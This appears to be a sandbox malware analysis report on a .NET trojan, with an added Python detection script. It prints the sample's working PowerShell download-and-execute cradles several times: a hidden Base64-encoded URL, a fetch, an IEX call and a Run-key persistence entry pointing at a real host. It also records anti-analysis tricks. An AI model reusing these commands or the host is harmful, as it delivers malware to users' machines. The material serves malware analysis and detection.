Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000008.00000002.1307175641.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1455748660.000001B76AD24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdby source: powershell.exe, 00000009.00000002.1455748660.000001B76ACD5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\app\assets\bin\temp-697cf367717e\obj\Release\CavnDkCvt.pdb source: 87J30ulb4q.exe
Source: Binary string: utomation.pdbA source: powershell.exe, 0000000C.00000002.1555560960.00000238D03A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdb[ source: powershell.exe, 0000000C.00000002.1555560960.00000238D03E4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdb! source: powershell.exe, 0000000C.00000002.1558187413.00000238D0698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb/^ source: powershell.exe, 0000000C.00000002.1557064368.00000238D0452000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb\ source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb: source: powershell.exe, 00000009.00000002.1455748660.000001B76AD31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: omation.pdbW source: powershell.exe, 0000000C.00000002.1558187413.00000238D0698000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\app\assets\bin\temp-697cf367717e\obj\Release\CavnDkCvt.pdbbn|n nn_CorExeMainmscoree.dll source: 87J30ulb4q.exe

Data Obfuscation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)@{# Script module or binary module file associated with this manifest.ModuleToProcess
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)@{# Script module or binary module file associated with this manifest.ModuleToProcess
Source: C:\Users\user\Desktop\87J30ulb4q.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
Source: 87J30ulb4q.exe Static PE information: 0xDF19A82E [Tue Aug 10 18:23:42 2088 UTC]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFE7CEF00BD pushad ; iretd 9_2_00007FFE7CEF00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FFE7CFC1516 push es; iretd 9_2_00007FFE7CFC1582

Boot Survival

Source: C:\Users\user\Desktop\87J30ulb4q.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jbgfag
Source: C:\Users\user\Desktop\87J30ulb4q.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jbgfag powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS91a2Joc3h6Y2p3cXlwaw=='));IEX $w.DownloadString($u)"
Source: C:\Users\user\Desktop\87J30ulb4q.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Memory allocated: A50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Memory allocated: 26F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Memory allocated: 46F0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Window / User API: threadDelayed 3414
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Window / User API: threadDelayed 3732
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Window / User API: threadDelayed 5299
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Window / User API: threadDelayed 4472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Window / User API: threadDelayed 3322
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Window / User API: threadDelayed 2145
Source: C:\Users\user\Desktop\87J30ulb4q.exe TID: 5220 -> Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\87J30ulb4q.exe TID: 1000 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320 -> Thread sleep count: 3414 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308 -> Thread sleep count: 3732 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372 -> Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280 -> Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616 -> Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504 -> Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764 -> Thread sleep count: 3322 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768 -> Thread sleep count: 2145 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816 -> Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: 87J30ulb4q.exe, 00000000.00000002.1336329887.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1455748660.000001B76AD24000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1558187413.00000238D0630000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Process token adjusted: Debug
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"
Source: unknown -> Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hid -noni -ep bypass -c "$w=new-object net.webclient;$u=[text.encoding]::utf8.getstring([convert]::frombase64string('ahr0chm6ly96amh5lmnvaw1icmf0cmf0ywrvcmvzlmnvbs91a2joc3h6y2p3cxlwaw=='));iex $w.downloadstring($u)"
Source: unknown -> Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hid -noni -ep bypass -c "$w=new-object net.webclient;$u=[text.encoding]::utf8.getstring([convert]::frombase64string('ahr0chm6ly96amh5lmnvaw1icmf0cmf0ywrvcmvzlmnvbs91a2joc3h6y2p3cxlwaw=='));iex $w.downloadstring($u)"
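The four process-creation entries above are the sample's entire delivery chain: a hidden, non-interactive PowerShell with the execution policy bypassed, a URL hidden behind [Convert]::FromBase64String, WebClient.DownloadString to fetch the next stage and IEX to run it. One caveat when reading them: the report prints the two 64-bit launches (source "unknown") entirely in lower case, and because Base64 is case-sensitive the lower-cased literal no longer decodes to the URL that was actually used. The Python below is an added triage example and is not part of the Joe Sandbox report or of the sample. It scores a command line against a set of cradle traits (the trait names, regexes and the threshold of four matches are this example's own choices), decodes the FromBase64String literal, flags a literal that a log pipeline has case-folded, and checks whether such a mangled literal re-encodes to a URL seen elsewhere in the report (here the /ukbhsxzcjwqypk URL from the URL table). The two sample command lines are copied from the entries above.

```python
import base64
import re
from urllib.parse import urlsplit

# Constructed sample: the two process-creation command lines recorded
# under "HIPS / PFW / Operating System Protection Evasion" above. The
# second is reproduced the way the report prints it, fully lower-cased,
# which silently corrupts the Base64 literal.
SAMPLE_CMDLINES = [
    r'''powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"''',
    r'''"c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hid -noni -ep bypass -c "$w=new-object net.webclient;$u=[text.encoding]::utf8.getstring([convert]::frombase64string('ahr0chm6ly96amh5lmnvaw1icmf0cmf0ywrvcmvzlmnvbs91a2joc3h6y2p3cxlwaw=='));iex $w.downloadstring($u)"''',
]

# Each regex is one trait of a download-and-execute cradle. The names and
# the threshold below are this example's own labels, not Sigma rule titles.
CRADLE_INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hid", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "non_interactive": re.compile(r"-noni(?:nteractive)?\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}
MIN_INDICATORS = 4

# The quoted literal handed to [Convert]::FromBase64String(...).
B64_LITERAL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def decode_literal(literal: str) -> dict:
    """Decode one Base64 literal and say whether it survived logging intact."""
    raw = base64.b64decode(literal, validate=True)
    text = raw.decode("ascii") if all(0x20 <= b < 0x7F for b in raw) else None
    # Base64 is case-sensitive: an all-lower-case literal that decodes to
    # non-printable bytes has almost certainly been case-folded by the log
    # pipeline rather than written that way by the attacker.
    case_mangled = text is None and literal == literal.lower()
    host = urlsplit(text).hostname if text and "://" in text else None
    return {"literal": literal, "text": text, "host": host, "case_mangled": case_mangled}


def analyse(cmdline: str) -> dict:
    """Score a PowerShell command line and pull out its encoded URL(s)."""
    hits = {name: bool(rx.search(cmdline)) for name, rx in CRADLE_INDICATORS.items()}
    score = sum(hits.values())
    return {
        "indicators": hits,
        "score": score,
        "is_cradle": score >= MIN_INDICATORS,
        "decoded": [decode_literal(lit) for lit in B64_LITERAL.findall(cmdline)],
    }


def matches_case_folded(literal: str, candidate_url: str) -> bool:
    """True if a case-folded literal is the Base64 of a URL known from elsewhere."""
    expected = base64.b64encode(candidate_url.encode("ascii")).decode("ascii")
    return expected.lower() == literal.lower()


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = analyse(line)
        print(f"cradle={result['is_cradle']} score={result['score']}")
        for d in result["decoded"]:
            print(f"  url={d['text']!r} host={d['host']} case_mangled={d['case_mangled']}")
    # The report's URL table lists /ukbhsxzcjwqypk; confirm that is what the
    # lower-cased second literal originally encoded.
    mangled = analyse(SAMPLE_CMDLINES[1])["decoded"][0]["literal"]
    print(matches_case_folded(mangled, "https://zjhy.coimbratratadores.com/ukbhsxzcjwqypk"))
```

The first line decodes cleanly to https://zjhy.coimbratratadores.com/jkqjcpxpnhtgxr on the same host as every other URL in the report; the second is flagged as case-mangled and only recovers by re-encoding the known URL and comparing case-insensitively. When a process-creation source normalises case, keep an unmodified copy of the command line, otherwise the indicator that matters most, the URL, is lost.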
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Queries volume information: C:\Users\user\Desktop\87J30ulb4q.exe VolumeInformation
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (5 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\ VolumeInformation (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (5 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\ VolumeInformation (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -> Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (5 identical entries)
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 87J30ulb4q.exe, 00000000.00000002.1336329887.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: 87J30ulb4q.exe, 00000000.00000002.1336329887.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp -> Binary or memory string: er\MsMpeng.exe
Source: C:\Users\user\Desktop\87J30ulb4q.exe -> WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
MITRE ATT&CK matrix, reduced to the techniques the report ties to at least one signature. The leading digits are the per-technique counts exactly as the report prints them; the unmatched placeholder techniques that fill the rest of the matrix are omitted.

Execution: 1 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 2 PowerShell
Persistence: 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading
Privilege Escalation: 11 Process Injection; 21 Registry Run Keys / Startup Folder; 1 DLL Side-Loading
Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading
Discovery: 21 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 12 System Information Discovery
Collection: 1 Archive Collected Data
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol
No signature-backed techniques in Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration or Impact.
Antivirus results (Source | Detection | Scanner | Label):
87J30ulb4q.exe | 53% | ReversingLabs | ByteCode-MSIL.Trojan.Nekark
87J30ulb4q.exe | 63% | Virustotal |
87J30ulb4q.exe | 100% | Joe Sandbox ML |
No Antivirus matches (three further scan tables in the report, all empty)

URL scan results (Source | Detection | Scanner | Label):
https://zjhy.coimbratratadores.com/gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRg | 0% | Avira URL Cloud | safe
http://zjhy.coimbratratadores.comd | 0% | Avira URL Cloud | safe
https://zjhy.coimbratratadores.com | 0% | Avira URL Cloud | safe
http://zjhy.coimbratratadores.com | 0% | Avira URL Cloud | safe
https://zjhy.coimbratratadores.com/ukbhsxzcjwqypk | 0% | Avira URL Cloud | safe
https://zjhy.coimbratratadores.com/gyofchhr/?l=y4CMuADfvJHUgATMgM3dvRmbpdFI0Z2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfpRHdvRHfwkDM1AzM | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
zjhy.coimbratratadores.com | 104.21.96.1 | true | false | | unknown

